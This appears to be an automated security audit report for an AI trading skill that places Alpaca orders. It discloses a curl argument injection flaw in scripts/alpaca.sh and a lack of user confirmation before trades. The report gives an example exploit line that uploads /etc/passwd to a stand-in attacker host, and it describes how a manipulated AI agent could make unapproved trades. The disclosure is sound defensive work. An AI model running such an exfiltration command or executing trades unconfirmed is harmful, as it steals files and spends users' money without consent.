Security Audit
lacymorrow/alpaca-trading-skill:root
github.com/lacymorrow/alpaca-trading-skillTrust Assessment
lacymorrow/alpaca-trading-skill:root received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 2 findings: 1 critical, 1 high, 0 medium, and 0 low severity. Key findings include Curl argument injection vulnerability in alpaca.sh, Skill allows direct execution of financial transactions without user confirmation.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 55/100, indicating areas for improvement.
Last analyzed on April 1, 2026 (commit 3f20c214). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings2
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Curl argument injection vulnerability in alpaca.sh The `alpaca.sh` script constructs the full URL by concatenating `BASE_URL` and `ENDPOINT` (which comes directly from user input `$2`). This combined `URL` string is then passed as a single, double-quoted argument to `curl`. If the `$ENDPOINT` contains ` --` followed by valid `curl` command-line options, `curl` will interpret these as options rather than part of the URL path. This allows an attacker to inject arbitrary `curl` options, potentially leading to:
- **Data Exfiltration**: Injecting options like `--upload-file /etc/passwd` to send local files to a remote server.
- **Arbitrary Request Modification**: Changing the HTTP method, headers, or body of the request, bypassing the intended API call.
- **SSRF (Server-Side Request Forgery)**: Directing `curl` to make requests to internal network resources.
Example exploit: `alpaca GET '/v2/account --upload-file /etc/passwd -X POST http://attacker.com/exfil'` The `ENDPOINT` variable, which is derived from untrusted user input, must be properly URL-encoded before being appended to `BASE_URL` to prevent `curl` from interpreting parts of it as command-line options. A robust solution involves using a URL-encoding function for the path component or using `curl`'s `--url` option with a fully URL-encoded string. For example, implement a `urlencode` function and use `URL="${BASE_URL}$(urlencode "$ENDPOINT")"`. | LLM | scripts/alpaca.sh:40 | |
| HIGH | Skill allows direct execution of financial transactions without user confirmation The `SKILL.md` documentation explicitly states a critical safety rule: "Show the order JSON before submitting. Let the user confirm symbol, qty, side, and type." (line 109). However, the `alpaca.sh` script directly executes `curl` commands to place orders based on the provided arguments without any interactive confirmation step. This creates a significant risk for an LLM using this skill. If the LLM is manipulated by a malicious prompt, it could execute financial transactions (e.g., buy/sell orders, closing positions) without presenting the details to the user for explicit confirmation, leading to unintended, irreversible, and potentially costly actions. This is a direct contradiction between the stated safety policy and the skill's implementation. Implement an explicit confirmation step within the skill's interaction flow before executing any financial transaction. The skill should return the proposed order JSON to the LLM, which then presents it to the user for an "Are you sure?" confirmation. The actual `alpaca.sh` script should only be called to execute the trade after explicit user approval. This requires a change in how the LLM interacts with the skill, ensuring that the LLM always requests and displays confirmation for sensitive actions. | LLM | SKILL.md:109 |
Scan History
Embed Code
[](https://skillshield.io/report/3c6f14fe62100987)
Powered by SkillShield